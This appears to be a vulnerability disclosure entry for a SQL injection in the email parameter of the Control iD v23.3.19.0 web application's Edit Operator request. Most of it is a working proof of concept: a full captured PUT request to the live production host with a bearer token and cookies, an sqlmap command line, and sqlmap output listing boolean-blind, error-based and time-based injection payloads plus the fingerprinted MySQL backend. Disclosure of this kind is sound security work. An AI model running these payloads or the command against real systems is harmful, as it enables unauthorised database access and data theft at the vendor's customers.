| Описание | The Control iD v23.3.19.0 product control web application has a SQL Injection vulnerability in the Edit Operator session in the "email" parameter of the PUT request.
PoC:
1 - When logging in to the application, go to:
Settings > Operators > Edit an Operator
2 - Click save and capture the request by burp.
3 - For validation, use this request:
PUT /v2/customerdb/operator.svc/a HTTP/2
Host: www.rhid.com.br
Cookie: _ga=GA1.3.376069673.1679840946; _gid=GA1.3.1767965208.1679840946; _gat_UA-9065969-5=1
Content-Length: 457
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjaWRDdXN0b21lcklkIjoiNzI2NiIsImNpZFVzZXJUeXBlIjoiMSIsImNpZFVzZXJJZCI6IjEiLCJjaWRTYWxlc0NoYW5uZWxJZCI6IjQ1NCIsImFjY2Vzc1R5cGUiOiIwIiwiY2lkQ3VzdG9tZXJEb21haW4iOiJyZWd1ZXR0ZSIsIm5hbWUiOiJBZG1pbmlzdHJhZG9yIiwiZW1haWwiOiJyZWd1ZXR0ZUBob3RtYWlsLmNvbSIsIm1heFVzZXJzIjoiMTAwIiwibWF4Q29tcGFueSI6IjEiLCJ1cmxMb2dvIjoiaHR0cHM6Ly9yaGlkdjIuczMtc2EtZWFzdC0xLmFtYXpvbmF3cy5jb20vY29udHJvbGlkLnBuZyIsIm1vc3RyYUNoYXQiOiJGYWxzZSIsImlkaW9tYSI6InB0X0JSIiwibmJmIjoxNjc5ODQ2NzA0LCJleHAiOjE2Nzk4NjExMDQsImlhdCI6MTY3OTg0NjcwNCwiaXNzIjoiUkhpRCB2Mi4wIn0.VfCR1ZxQ0AnahJxo7Hx2_6RSUGDOP1REskhC47LZNDE
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.rhid.com.br
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rhid.com.br/v2/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
{"excluded":false,"id":3,"approvalFlow":null,"email":"[email protected]'","expiredPassword":false,"foto":null,"idApprovalFlow":null,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":""}
--------------------------
4 - SQLMap:
python3 sqlmap.py -r request.txt -p email --dbs --tamper=space2comment --random-agent --level 3 --risk 3
sqlmap identified the following injection point(s) with a total of 748 HTTP(s) requests:
---
Parameter: JSON email (PUT)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' RLIKE (SELECT (CASE WHEN (8993=8993) THEN 0x74657374654074657374652e636f6d ELSE 0x28 END)) AND 'SHab'='SHab","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' AND GTID_SUBSET(CONCAT(0x7162627871,(SELECT (ELT(6226=6226,1))),0x716b717071),6226) AND 'qvWu'='qvWu","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' OR SLEEP(5) AND 'eVwS'='eVwS","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2016 or 2022 or 11 or 2019 or 10
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 10.0
back-end DBMS: MySQL >= 5.6 (Aurora fork) |
|---|